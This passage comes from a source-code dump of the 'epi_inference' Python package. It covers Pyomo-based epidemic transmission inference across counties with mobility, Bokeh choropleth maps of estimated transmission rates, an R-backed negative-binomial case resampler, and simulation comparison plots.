status.append('ok')\n betas.append(value(m.beta[i])) \n\n return {'est_beta':betas, 'status':status, 'population': pops, 'case_count':casecount, 'FIPS':fips}\n \"\"\"\n\n \"\"\"\n for i in m.beta:\n print('{},{},{},{},{}'.format(i, value(m.beta[i]), float(cm_rep_cases[i].values[-1]), populations[i], m.beta[i].stale))\n\n import matplotlib.pyplot as plt\n df = pd.DataFrame({'est_beta': [value(m.beta[i]) for i in m.beta if float(cm_rep_cases[i].values[-1]) > 10]})\n df.hist()\n plt.show()\n\n errors = dict()\n for c in m.NODES:\n cerrors = list()\n for t in m.TIMES:\n cerrors.append( (value(m.T_hat[c,t])-m.T_data[c][t])/max(1.0,m.T_data[c][t]) )\n errors[c] = cerrors\n\n df = pd.DataFrame(errors)\n df.plot()\n plt.show()\n quit()\n\n\n return {'est_beta': value(m.beta),'status': 'ok', 'msg': 'Optimal solution found'}\n \"\"\"\n\n\ndef create_inference_formulation_multinode_mobility_decay_lsq(Cdates, cumulative_reported_cases, populations, mobility, sigma, gamma_1, gamma_2, gamma_3, report_delay, reporting_factor, analysis_window, verbose=False):\n \"\"\"\n Creates a one-step-ahead inference model using a decay\n model with 3 I compartments. The model is written in terms of absolute\n numbers of cases (not ln-transform). The model combines estimates across\n multiple time series, one for each node.\n\n Parameters\n ----------\n Cdates: list of datetime objects\n The list of datetime objects that correspond to the dates for the\n cumulative_reported_cases\n cumulative_reported_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n populations : a dataframe with a single column that represents the\n population for different columns in cumulative_reported_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma_1 : float\n the rate constant for leaving the I1 compartment.\n gamma_2 : float\n the rate constant for leaving the I2 compartment.\n gamma_3 : float\n the rate constant for leaving the I3 compartment.\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n if len(analysis_window) != 0:\n raise NotImplementedError('analysis_window is not yet implemented for multinode_decay_lsq')\n model = pe.ConcreteModel()\n\n # Cached data\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.eta = 0.5 # fraction of the day spent \"away\"\n model.report_delay = report_delay\n model.reporting_factor = reporting_factor\n\n #model.NODES = pe.Set(initialize=list(range(len(cumulative_reported_cases.keys()))))\n model.NODES = pe.Set(initialize=list(k for k in cumulative_reported_cases.keys()))\n model.beta = pe.Var(model.NODES, initialize=1.0, bounds=(0,None)) # transmission parameter\n # for now, alpha is not used\n # model.alpha = pe.Var(initialize=1.0)\n # model.alpha.fix(1.0)\n\n model.mobility = dict(mobility)\n #model.mobility = dict()\n for i in model.NODES:\n if i not in model.mobility:\n model.mobility[i] = {}\n model.populations = dict()\n \n model.T_data = dict()\n model.I_data = dict()\n model.S_data = dict()\n for nodeid in model.NODES:\n model.populations[nodeid] = float(populations[nodeid]) # overall population\n cm_rep_cases_node = [v for v in cumulative_reported_cases[nodeid].values]\n rdates, rcases = \\\n rcommon.reported_cases_from_cumulative(Cdates, cm_rep_cases_node)\n\n dates, T, S, E, I1, I2, I3, R = \\\n recon.reconstruct_states_deterministic_decay(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases_node,\n population=model.populations[nodeid],\n sigma=sigma,\n gamma=gamma_1/3,\n reporting_factor=reporting_factor,\n report_delay=report_delay\n )\n model.T_data[nodeid] = T\n model.I_data[nodeid] = dict()\n model.I_data[nodeid]['I1'] = I1\n model.I_data[nodeid]['I2'] = I2\n model.I_data[nodeid]['I3'] = I3\n model.S_data[nodeid] = S\n \n if not hasattr(model, 'TIMES'):\n model.TIMES = pe.Set(initialize=[i for i in range(len(T))], ordered=True)\n\n # define the variable for estimated transmissions\n model.T_hat = pe.Var(model.NODES, model.TIMES, initialize=1.0)\n\n # infection process\n #\n # NOTE: We need to be careful how we model borders. If the mobility matrix says we cross them, then \n # how do we model the impact of infection on that mobile population?\n #\n def _infection_process(m, i, t):\n percent_mobile = 0\n if i in m.mobility:\n percent_mobile = sum(m.mobility[i][j]/m.populations[i] for j in m.mobility[i] if j in m.NODES)\n #percent_mobile = sum(m.mobility[i][j]/m.populations[i] for j in m.mobility[i])\n return m.T_hat[i,t] == m.beta[i] * (m.I_data[i]['I1'][t] + m.I_data[i]['I2'][t] + m.I_data[i]['I3'][t]) / m.populations[i] * m.S_data[i][t] * (1-m.eta*percent_mobile) \\\n + sum(m.beta[j] * (m.I_data[j]['I1'][t] + m.I_data[j]['I2'][t] + m.I_data[j]['I3'][t]) / m.populations[j] * m.S_data[i][t] * (m.eta*m.mobility[i][j]/m.populations[i]) for j in m.mobility[i] if j in m.NODES)\n #return m.T_hat[i,t] == m.beta * (I_data[i]['I1'][t] + I_data[i]['I2'][t] + I_data[i]['I3'][t]) * S_data[i][t] / m.populations[i]\n\n model.infection_process = pe.Constraint(model.NODES, model.TIMES, rule=_infection_process)\n\n # least squares objective function\n def _lse(m, i):\n return sum( (m.T_hat[i,t] - m.T_data[i][t])**2 for t in m.TIMES)\n model.lse = pe.Expression(model.NODES, rule=_lse)\n\n def _total_lse(m):\n return sum( m.lse[i] for i in m.NODES )\n model.total_lse = pe.Objective(rule=_total_lse)\n\n ## likelihood objective function\n #def _like(m):\n # #return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one if I1[t-1] + I2[t-1] + I3[t-1] > 0) + \\\n # # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one)\n # return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one if I1[t] + I2[t] + I3[t] > 0) + \\\n # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one)\n #model.like = pe.Objective(rule=_like, sense=pe.maximize)\n #model.like.deactivate()\n\n return model\n\n" }, { "alpha_fraction": 0.6441593766212463, "alphanum_fraction": 0.6502363085746765, "avg_line_length": 31.04347801208496, "blob_id": "8f8bc032ab313b22382db403f515d3e922c1cf68", "content_id": "64c4526758431c9a0c43532301d16e76b94ed508", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1481, "license_type": "no_license", "max_line_length": 106, "num_lines": 46, "path": "/epi_inference/ATTIC/epiinf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "#\n# Main script for epi_inference\n#\nimport argparse\nfrom . import collect\nfrom . import inference\nfrom . import reconstruct\n\ndef main():\n Parser = argparse.ArgumentParser(description='inference models')\n Parser.add_argument('-v', '--verbose', action='store_true', default=False,\n help='Verbosity flag')\n subparsers = Parser.add_subparsers(title='subcommands', help=\"Help\", dest=\"subparser_name\")\n #\n # epiinf collect\n #\n parser1 = subparsers.add_parser('collect', help='Collect data for inference models')\n parser1.add_argument('config_file',\n help='YAML configuration file')\n parser1.set_defaults(subparser_func=collect.run)\n #\n # epiinf inference\n #\n parser2 = subparsers.add_parser('inference', help='Optimize an inference model')\n parser2.add_argument('config_file',\n help='YAML configuration file')\n parser2.set_defaults(subparser_func=inference.run)\n #\n # epiinf reconstruct\n #\n parser3 = subparsers.add_parser('reconstruct', help='Reconstruct disease propigation given case data')\n parser3.add_argument('config_file',\n help='YAML configuration file')\n parser3.set_defaults(subparser_func=reconstruct.run)\n #\n # Process arguments\n #\n args = Parser.parse_args()\n if args.subparser_name is None:\n Parser.print_help()\n return\n return args.subparser_func(args)\n\n\nif __name__ == \"__main__\":\n main()\n\n \n\n" }, { "alpha_fraction": 0.5705128312110901, "alphanum_fraction": 0.5848007202148438, "avg_line_length": 36.31123733520508, "blob_id": "162bacb5722e554f6c6e151fa18ad2066d8efcca", "content_id": "c42fa944f484d4785db317870795056365ff4f4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12948, "license_type": "no_license", "max_line_length": 292, "num_lines": 347, "path": "/epi_inference/viz/choropleth/choropleth.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['create_us_choropleth_scenario', 'create_us_choropleth_summary']\n\nimport sys\nimport geopandas as gpd\nimport json\nimport os.path\n\ntry:\n from bokeh.io import output_notebook, save, show, output_file\n from bokeh.plotting import figure\n from bokeh.models import GeoJSONDataSource, LinearColorMapper, ColorBar, RangeSlider, PreText, CustomJS\n from bokeh.layouts import gridplot\n from bokeh.palettes import brewer\n from bokeh.resources import CDN\n bokeh_available=True\nexcept:\n bokeh_available=False\n\ncurrdir = os.path.dirname(__file__)\n\nNON_CONTINENTAL = set(['02','15','60','66','69','72','78'])\n\n\ndef get_values_scenario(gdf, results_json, date, value='beta', value_name='beta'):\n if date is None:\n index=-1\n for fips in results_json:\n datestring = results_json[fips]['date'][index]\n break\n else:\n for fips in results_json:\n index = results_json[fips]['date'].index(date)\n datestring = results_json[fips]['date'][index]\n break\n all_values = set()\n vals = []\n status = []\n for fips in gdf['fips']:\n if fips in results_json:\n status.append( results_json[fips]['status'][index] )\n else:\n status.append( None )\n\n if fips in results_json and results_json[fips]['status'][index] == 'ok':\n val = results_json[fips][value][index]\n vals.append(val)\n all_values.add(val)\n else:\n vals.append(None)\n\n ans = {}\n if len(all_values) == 0:\n return ans, None\n ans[value_name] = vals\n ans['Solver Status'] = status\n ans['Date'] = datestring\n return ans, max(all_values)\n\n\ndef create_us_choropleth_scenario(*, results_json, value_key, date=None, shapefile=os.path.join(currdir, 'data/cb_2019_us_county_5m.shp'), states=None, description=\"Unknown Bokeh Choropleth\", value_name=\"Value\", max_value=None, crange=None, cvalue=None, output_html=None, show_browser=False):\n if not bokeh_available:\n raise RuntimeError(\"Need to install bokeh package to generate choropleth visualization\")\n #\n # Load data and rename columns\n #\n gdf = gpd.read_file(shapefile)\n #print(gdf.head())\n if states is None:\n sfp = gdf['STATEFP'].to_list()\n sfp = [x not in NON_CONTINENTAL for x in sfp]\n gdf = gdf.loc[sfp, ]\n elif states == 'AK': \n gdf = gdf.loc[gdf['STATEFP'] == '02',]\n elif states == 'HI': \n gdf = gdf.loc[gdf['STATEFP'] == '15',]\n #\n # Setup data that will be presented\n #\n gdf = gdf[['GEOID', 'NAME', 'geometry']]\n gdf.columns = ['fips', 'county_name', 'geometry']\n all_values, max_value = get_values_scenario(gdf, results_json, date, value_key)\n datestring = all_values['Date']\n gdf.insert(1, \"solver_status\", all_values['Solver Status'])\n gdf.insert(1, \"plot_value\", all_values['beta'])\n #\n # Create GeoJSONDataSource\n #\n gdf_json = json.loads(gdf.to_json())\n json_data = json.dumps(gdf_json)\n geosource = GeoJSONDataSource(geojson = json_data)\n #\n # The color bar assumes values go from 0 to some maximum value. The use can specify the \n # maximum value on the scale, or it will be inferred here\n #\n if max_value is None:\n max_value = int(max_value)+1\n if crange is None:\n crange = [0, max_value]\n else:\n crange = list(crange)\n if cvalue is None:\n cvalue = [crange[0], crange[1]]\n else:\n cvalue = list(cvalue)\n if crange[1] > max_value:\n crange[1] = max_value\n if cvalue[1] > crange[1]:\n cvalue[1] = crange[1]\n if cvalue[0] < crange[0]:\n cvalue[0] = crange[0]\n \n tick_labels = {}\n for i in range(10):\n val = max_value * i/10.0\n tick_labels[str(val)] = '%.02f' % val\n tick_labels[str(max_value)] = '>=%d' % max_value\n\n palette = brewer['OrRd'][8]\n palette = ['white'] + list(palette[::-1])\n color_mapper = LinearColorMapper(palette = palette, low = 0, high = max_value)\n color_mapper.nan_color = 'darkgray'\n color_mapper.high_color = 'black'\n\n color_bar = ColorBar(color_mapper=color_mapper, label_standoff=8, width=500, height=20,\n border_line_color=None,\n bar_line_color='black',\n major_label_text_color='black',\n location = (-10,0), \n orientation='horizontal')\n\n p = figure(title = description+\" - \"+datestring,\n match_aspect=True,\n plot_width=1200,\n x_axis_location=None,\n y_axis_location=None,\n tools=\"pan,box_zoom,wheel_zoom,reset,hover,save\",\n tooltips=[ (\"Name\", \"@county_name\"), (\"FIPS\", \"@fips\"), (value_name, \"@plot_value\"), (\"Solver Status\", \"@solver_status\"), (\"(Long, Lat)\", \"($x, $y)\") ]\n )\n\n p.hover.point_policy = \"follow_mouse\"\n p.xgrid.grid_line_color = None\n p.ygrid.grid_line_color = None\n p.patches('xs','ys', \n source=geosource, \n fill_color={'field' :'plot_value', 'transform' : color_mapper},\n line_color='black',\n line_width=0.25,\n fill_alpha=1)\n\n p.add_layout(color_bar, 'below')\n\n # widgets\n range_slider = RangeSlider(start=crange[0], end=crange[1], value=cvalue, value_throttled=cvalue, step=0.1, width=500)\n select_code = \"\"\"\nvar maxval = cb_obj.value_throttled[1];\nvar minval = cb_obj.value_throttled[0];\n \ncolor_mapper.high = maxval;\ncolor_mapper.low = minval;\n\n\"\"\"\n callback = CustomJS(args=dict(range_slider=range_slider, color_mapper=color_mapper, plot=p), code = select_code)\n range_slider.js_on_change('value_throttled', callback)\n\n text = PreText(text='The low/high of the color mapper will be set to the values of the range slider\\nValues > max are shown in black\\nValues < min are shown in white\\nMissing values are shown in gray',width=800)\n \n # final plot layout\n final = gridplot([[p],[range_slider],[text]], toolbar_location=\"left\")\n\n print(\"Creating file: \"+output_html)\n output_file(output_html, mode='inline', title=\"US Choropleth Plot\")\n save(final)\n if show_browser:\n show(final)\n\n\ndef get_values_summary(gdf, summary_csv, date, value='qmean_filtered_est_beta'):\n if date is None:\n index=-1\n for fips in summary_csv:\n datestring = summary_csv[fips][index]['dates']\n summary_cols = set(summary_csv[fips][index].keys()) - set(['dates'])\n break\n else:\n for fips in summary_csv:\n for index in range(len(summary_csv[fips][index])):\n if date == summary_csv[fips][index]['dates']:\n datestring = date\n summary_cols = set(summary_csv[fips][index].keys()) - set(['dates'])\n break\n\n\n vals = {}\n for col in summary_cols:\n vals[col] = []\n all_values = set()\n status = []\n for fips in gdf['fips']:\n if fips in summary_csv:\n for col in summary_cols:\n val = summary_csv[fips][index][col]\n if val == '':\n vals[col].append(None)\n else:\n val = float(val)\n vals[col].append(val)\n if col == value:\n all_values.add(val)\n else:\n for col in summary_cols:\n vals[col].append(None)\n\n ans = {}\n if len(all_values) == 0:\n return ans, None\n for col in summary_cols:\n ans[col] = vals[col]\n ans['Date'] = datestring\n return ans, max(all_values)\n\n\ndef create_us_choropleth_summary(*, summary_csv, value_key, date=None, shapefile=os.path.join(currdir, 'data/cb_2019_us_county_5m.shp'), states=None, description=\"Unknown Bokeh Choropleth\", value_name=\"Value\", max_value=None, crange=None, cvalue=None, output_html=None, show_browser=False):\n if not bokeh_available:\n raise RuntimeError(\"Need to install bokeh package to generate choropleth visualization\")\n #\n # Load data and rename columns\n #\n gdf = gpd.read_file(shapefile)\n if states is None:\n sfp = gdf['STATEFP'].to_list()\n sfp = [x not in NON_CONTINENTAL for x in sfp]\n gdf = gdf.loc[sfp, ]\n elif states == 'AK': \n gdf = gdf.loc[gdf['STATEFP'] == '02',]\n elif states == 'HI': \n gdf = gdf.loc[gdf['STATEFP'] == '15',]\n #\n # Setup data that will be presented\n #\n gdf = gdf[['GEOID', 'NAME', 'geometry']]\n gdf.columns = ['fips', 'county_name', 'geometry']\n all_values, max_value = get_values_summary(gdf, summary_csv, date)\n datestring = all_values['Date']\n gdf.insert(1, \"mean_beta\", all_values['qmean_filtered_est_beta'])\n gdf.insert(1, \"q05_beta\", all_values['q05_filtered_est_beta'])\n gdf.insert(1, \"q95_beta\", all_values['q95_filtered_est_beta'])\n #\n # Create GeoJSONDataSource\n #\n gdf_json = json.loads(gdf.to_json())\n json_data = json.dumps(gdf_json)\n geosource = GeoJSONDataSource(geojson = json_data)\n #\n # The color bar assumes values go from 0 to some maximum value. The use can specify the \n # maximum value on the scale, or it will be inferred here\n #\n if max_value is None:\n max_value = int(max_value)+1\n if crange is None:\n crange = [0, max_value]\n else:\n crange = list(crange)\n if cvalue is None:\n cvalue = [crange[0], crange[1]]\n else:\n cvalue = list(cvalue)\n if crange[1] > max_value:\n crange[1] = max_value\n if cvalue[1] > crange[1]:\n cvalue[1] = crange[1]\n if cvalue[0] < crange[0]:\n cvalue[0] = crange[0]\n \n tick_labels = {}\n for i in range(10):\n val = max_value * i/10.0\n tick_labels[str(val)] = '%.02f' % val\n tick_labels[str(max_value)] = '>=%d' % max_value\n\n palette = brewer['OrRd'][8]\n palette = ['white'] + list(palette[::-1])\n color_mapper = LinearColorMapper(palette = palette, low = 0, high = max_value)\n color_mapper.nan_color = 'darkgray'\n color_mapper.high_color = 'black'\n\n color_bar = ColorBar(color_mapper=color_mapper, label_standoff=8, width=500, height=20,\n border_line_color=None,\n bar_line_color='black',\n major_label_text_color='black',\n location = (-10,0), \n orientation='horizontal')\n\n p = figure(title = description+\" - \"+datestring,\n match_aspect=True,\n plot_width=1200,\n x_axis_location=None,\n y_axis_location=None,\n tools=\"pan,box_zoom,wheel_zoom,reset,hover,save\",\n tooltips=[ (\"Name\", \"@county_name\"), (\"FIPS\", \"@fips\"), (\"5% Quantile Beta\", \"@q05_beta\"), (\"Mean Beta\", \"@mean_beta\"), (\"95% Quantile Beta\", \"@q95_beta\"), (\"(Long, Lat)\", \"($x, $y)\") ]\n )\n\n p.hover.point_policy = \"follow_mouse\"\n p.xgrid.grid_line_color = None\n p.ygrid.grid_line_color = None\n p.patches('xs','ys', \n source=geosource, \n fill_color={'field' :'mean_beta', 'transform' : color_mapper},\n line_color='black',\n line_width=0.25,\n fill_alpha=1)\n\n p.add_layout(color_bar, 'below')\n\n # widgets\n range_slider = RangeSlider(start=crange[0], end=crange[1], value=cvalue, value_throttled=cvalue, step=0.1, width=500)\n select_code = \"\"\"\nvar maxval = cb_obj.value_throttled[1];\nvar minval = cb_obj.value_throttled[0];\n \ncolor_mapper.high = maxval;\ncolor_mapper.low = minval;\n\n\"\"\"\n callback = CustomJS(args=dict(range_slider=range_slider, color_mapper=color_mapper, plot=p), code = select_code)\n range_slider.js_on_change('value_throttled', callback)\n\n text = PreText(text='The low/high of the color mapper will be set to the values of the range slider\\nValues > max are shown in black\\nValues < min are shown in white\\nMissing values are shown in gray',width=800)\n \n # final plot layout\n final = gridplot([[p],[range_slider],[text]], toolbar_location=\"left\")\n\n print(\"Creating file: \"+output_html)\n output_file(output_html, mode='inline', title=\"US Choropleth Plot\")\n save(final)\n if show_browser:\n show(final)\n\n\nif __name__ == \"__main__\":\n import os.path\n import json\n if os.path.exists(\"../../../examples/collects/results_countydata5_FL_windows_mobility.json\"):\n with open(\"../../../examples/collects/results_countydata5_FL_windows_mobility.json\",\"r\") as INPUT:\n results = json.load(INPUT)\n create_us_choropleth(results_json=results, value_key=\"beta\", date=\"2020-04-02\", description=\"Debugging\", crange=(0,10), cvalue=(0,3))\n else:\n create_us_choropleth(results_json={}, value_key=None, value_name=\"FOO\", description=\"Debugging\", crange=(0,10), cvalue=(0,3), max_value=1)\n\n" }, { "alpha_fraction": 0.5533650517463684, "alphanum_fraction": 0.5560842752456665, "avg_line_length": 34, "blob_id": "1ef6ab8ce3cd6e560ed5a217edafc7ad801e3f04", "content_id": "6a912d49949682f76da1102d2d5070d802933bed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1471, "license_type": "no_license", "max_line_length": 90, "num_lines": 42, "path": "/epi_inference/engine/misc.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['save_metadata', 'compute_basename']\n\nimport yaml\nimport datetime\n\n\ndef compute_basename(filename):\n if filename.endswith('.csv') or filename.endswith('.yml') or filename.endswith('jsn'):\n return filename[:-4]\n if filename.endswith('.yaml') or filename.endswith('.json'):\n return filename[:-5]\n return None\n\n\ndef save_metadata(cargs, warnings, data=None):\n #\n # If the YAML data contains an 'output*' file, then \n # create a YAML file with metadata\n #\n ofname = None\n ofname = cargs.get('output',ofname)\n ofname = cargs.get('output_csv',ofname)\n ofname = cargs.get('output_json',ofname)\n if ofname is not None:\n metadata = {}\n metadata['timestamp'] = str(datetime.datetime.now())\n metadata['configuration'] = {}\n for key in cargs:\n metadata['configuration'][key] = cargs[key]\n if not data is None and len(data) > 0:\n metadata['workflow parameters'] = data\n if len(warnings) > 0:\n metadata['warnings'] = warnings\n #\n basename = compute_basename(ofname)\n if basename is None:\n raise RuntimeError(\"Unknown output suffix: \"+ofname)\n dfile = basename+\"_meta.yml\"\n #\n print(\"Writing file: \"+dfile)\n with open(dfile, 'w') as OUTPUT:\n yaml.dump(metadata, OUTPUT)\n\n" }, { "alpha_fraction": 0.5928922295570374, "alphanum_fraction": 0.6090725064277649, "avg_line_length": 37.46666717529297, "blob_id": "9f9ca1ba1cba88eb0f020150a555235c231bedaa", "content_id": "8ebfe47bf67aaac27572c2c9e0a5c86a3046ec92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3461, "license_type": "no_license", "max_line_length": 127, "num_lines": 90, "path": "/R_utilities/resample.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import rpy2.robjects as robjects\nimport os\nfrom rpy2.robjects.packages import importr\nimport pandas as pd\nimport numpy as np\nimport rpy2.robjects.numpy2ri\nrpy2.robjects.numpy2ri.activate()\n\nbase = importr('base')\nutils = importr('utils')\n# utils.install_packages('MASS', type='source')\nMASS = importr('MASS')\n\nmain_dir = '../../covid-data/formatted_data/county_data/'\nfolder_name = sorted(os.listdir(main_dir))[-1]\npath = main_dir + '/' + folder_name\n\nwrite_path = '../../covid-data/formatted_data/county_data_resample/' + folder_name + '/'\nif not os.path.exists(write_path):\n os.makedirs(write_path)\n\nrstring=\"\"\"\n function(window_data, low){\n library(MASS)\n fit <- TRUE\n fit <- tryCatch(fitdistr(window_data, 'Negative Binomial', lower = low), \n error = function(cond){\n return(fitted = FALSE)\n })\n if (length(fit) == 1){\n p1 <- mean(window_data)\n p2 <- sd(window_data)\n } else {\n p1 <- as.numeric(fitdistr(window_data, 'Negative Binomial', lower = low)$estimate[2])\n p2 <- as.numeric(fitdistr(window_data, 'Negative Binomial', lower = low)$estimate[1])\n }\n c(p1, p2)\n }\n\"\"\"\nr_fit_negbin = robjects.r(rstring)\n\ncounty_files = sorted(os.listdir(path))\n# Symmetric window, so this is the number of days on either side of the day being calculated,\n# leaving a total window size of 2xwindow + 1 days\nwindow = 3\nn_samples = 100\n\ndef sample_county_negbin(countyfile):\n dat = pd.read_csv(path + '/' + countyfile)\n idx_range = list(range((window + 1), dat.shape[0])) # Instead using a symmetric window until the end, then using past data\n\n # If the county has no cases, keep them all at zero\n if dat.Confirmed.iloc[-1] == 0:\n samples_negbin = pd.DataFrame(np.zeros((len(idx_range), n_samples)))\n else:\n initial = dat.Confirmed[0]\n daily_increases = np.array(dat.Confirmed[1:dat.shape[0]] - dat.Confirmed[0:(dat.shape[0] - 1)].values)\n daily = np.concatenate(([initial], daily_increases))\n samples_negbin = pd.DataFrame(columns=['s' + str(i) for i in range(1, 101)])\n r = 0\n for i in range((window + 1), dat.shape[0]):\n if i > dat.shape[0] - window:\n window_data = daily[(len(daily) - (2 * window + 1)): len(daily)]\n else:\n # Using a symmetric window (window size is number of days on either side of date of interest)\n window_data = daily[(i - window):(i + window)]\n if (all(window_data == 0)):\n # Need to force the negative binomial parameters to get a fit in some cases\n params = [0,1]\n else:\n if min(window_data) < 2:\n low = 0.1\n else:\n low = 1\n params = r_fit_negbin(window_data, low)\n samples_negbin.loc[r] = MASS.rnegbin(n_samples, params[0], params[1])\n r += 1\n\n # Reformat: add date and FIPS column, and make a cumulative sum instead of daily counts\n samples_cases = samples_negbin.cumsum()\n Date = pd.DataFrame(dat.Date[(window + 1):dat.shape[0]]).reset_index()\n FIPS = pd.DataFrame(dat.FIPS[(window + 1):dat.shape[0]]).reset_index()\n samples_cases['Date'] = Date.Date\n samples_cases['FIPS'] = FIPS.FIPS\n return samples_cases\n\n\nfor i in county_files:\n resample = sample_county_negbin(i)\n # This returns a dataframe - what do we want to do with it?" }, { "alpha_fraction": 0.7878151535987854, "alphanum_fraction": 0.7878151535987854, "avg_line_length": 25.44444465637207, "blob_id": "7cf93de5dca5b65febd6c816e49ba183012ab486", "content_id": "527199f21e5a580e3f1c2284bde05c12704c35c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 476, "license_type": "no_license", "max_line_length": 83, "num_lines": 18, "path": "/README.md", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "# epi_inference\n\nA python package that supports inference for epidemiology models\n\n## Installation with CONDA (for users)\n\n* conda install pyomo\n* conda install -c conda-forge ipopt\n* python setup.py install\n\n## Installation with CONDA (for developers)\n\n* conda install pyomo\n* conda install -c conda-forge ipopt\n* python setup.py develop\n\nAfter installation, edits in the epi\\_inference software directory will immediately\nchange the installed epi\\_inference python package.\n" }, { "alpha_fraction": 0.5207387208938599, "alphanum_fraction": 0.5343626737594604, "avg_line_length": 46.760868072509766, "blob_id": "8e51866fcc390cd219c847a43304d8f9d22c89d8", "content_id": "4d281cc9a7679852772594cc1568ada8d250474e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6606, "license_type": "no_license", "max_line_length": 167, "num_lines": 138, "path": "/epi_inference/evaluation/reconstruction/single-simulation/simulation_figs.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport os\nfrom datetime import datetime\nfrom epi_inference.formulations.simulation import simulate_discrete_seiiir_stochastic, simulate_continuous_seiiir_deterministic, simulate_discrete_seiiir_deterministic\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\n\"\"\"\nThis module runs a deterministic model and compares the resutls with a number\nof realizations of the stochastic simulation. There is an obvious discrepency\nthat is a result of the day discretization (instead of using a smaller discretization).\nToDo: rewrite the stochastic simulation to operate over smaller discretizations.\nNote that these simulations are used only in testing, and not part of the results\nproduced by the package.\n\"\"\"\n\ndef generate_simulation_figures(tf, fname):\n output_path = os.path.dirname(fname)\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n N=100000\n y0={'S': N, 'E': 0, 'I1': 5, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5.2\n gamma = 1/4.3\n beta = 2.2*gamma\n rho = 10\n report_delay = 8\n tx = None\n #[0]*tf\n #tx[30] = 1\n\n Cdates,Ccases,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n Ccases = np.round(Ccases).astype(int)\n dfsim_S = pd.DataFrame({'dates': dates, 'values':S}).set_index('dates')\n dfsim_T = pd.DataFrame({'dates': dates, 'values':T}).set_index('dates')\n dfsim_E = pd.DataFrame({'dates': dates, 'values':E}).set_index('dates')\n dfsim_I1 = pd.DataFrame({'dates': dates, 'values':I1}).set_index('dates')\n dfsim_I2 = pd.DataFrame({'dates': dates, 'values':I2}).set_index('dates')\n dfsim_I3 = pd.DataFrame({'dates': dates, 'values':I3}).set_index('dates')\n dfsim_R = pd.DataFrame({'dates': dates, 'values':R}).set_index('dates')\n\n dfstoch_S = None\n dfstoch_T = None\n dfstoch_E = None\n dfstoch_I1 = None\n dfstoch_I2 = None\n dfstoch_I3 = None\n dfstoch_R = None\n for real in range(50):\n# Cdates, Ccases, dates, T, S, E, I1, I2, I3, R = simulate_continuous_seiiir_deterministic(y0, tf, beta=beta,\n# sigma=sigma, gamma=gamma,\n# rho=rho, N=N,\n# report_delay=report_delay,\n# tx=tx)\n Cdates,Ccases,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_stochastic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n #rdates, rcases, dates, T, S, E, I1, I2, I3, R = stochastic_reconstruction(Cdates, Ccases, N)\n\n if dfstoch_S is None:\n dfstoch_S = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_T = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_E = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_I1 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_I2 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_I3 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_R = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n \n dfstoch_S['{}'.format(real)] = S\n dfstoch_T['{}'.format(real)] = T\n dfstoch_E['{}'.format(real)] = E\n dfstoch_I1['{}'.format(real)] = I1\n dfstoch_I2['{}'.format(real)] = I2\n dfstoch_I3['{}'.format(real)] = I3\n dfstoch_R['{}'.format(real)] = R\n\n with PdfPages(fname) as pdf:\n ax = dfstoch_S.plot(color='silver', legend=False)\n dfsim_S[dfsim_S.index.isin(dfstoch_S.index)].plot(ax=ax, color='black', legend='Simulated S')\n plt.title('S comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfstoch_T.plot(color='silver', legend=False)\n dfsim_T[dfsim_T.index.isin(dfstoch_T.index)].plot(ax=ax, color='black', legend='Simulated 